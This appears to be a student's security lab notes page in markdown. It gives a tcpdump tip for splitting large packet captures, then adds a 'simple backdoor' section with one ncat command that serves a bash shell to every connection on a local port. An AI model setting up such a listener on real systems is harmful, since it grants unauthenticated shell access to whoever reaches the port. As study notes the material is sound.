Laufeynumber1fan/laufeynumber1fan.github.io/addendums.md

 If, for example, `big.pcap` is 3GB big, tcpdump's -C (file size) flag may be used to carve `big.pcap` into 1GB pcaps.
 The output of this command will generate `small.pcap` `small.pcap1` `small.pcap2`
 If you're looking for a specific TCP stream or conversation, the entire connection will most likely be captured in a 1GB pcap slice.
 It's also palatable enough to open the slice on wireshark!

+## Simple backdoor with ncat
+(Note: Discovered this in [linuxzoo.net's kali room](https://linuxzoo.net/page/lab_kali2024-4/wk01c.html#frm_17))

+You can create a simple backdoor with [ncat](https://laufeynumber1fan.github.io/tool-journal.html#ncat) by executing a bash shell upon connecting to a `ncat` session:

+`ncat -l localhost 7890 -c '/bin/bash' -k`
+`-l` Make port 7890 to listen for ncat connections.
+`-c` Run a bash shell upon connection.
+`-k` Allow multiple connections (in this case shells).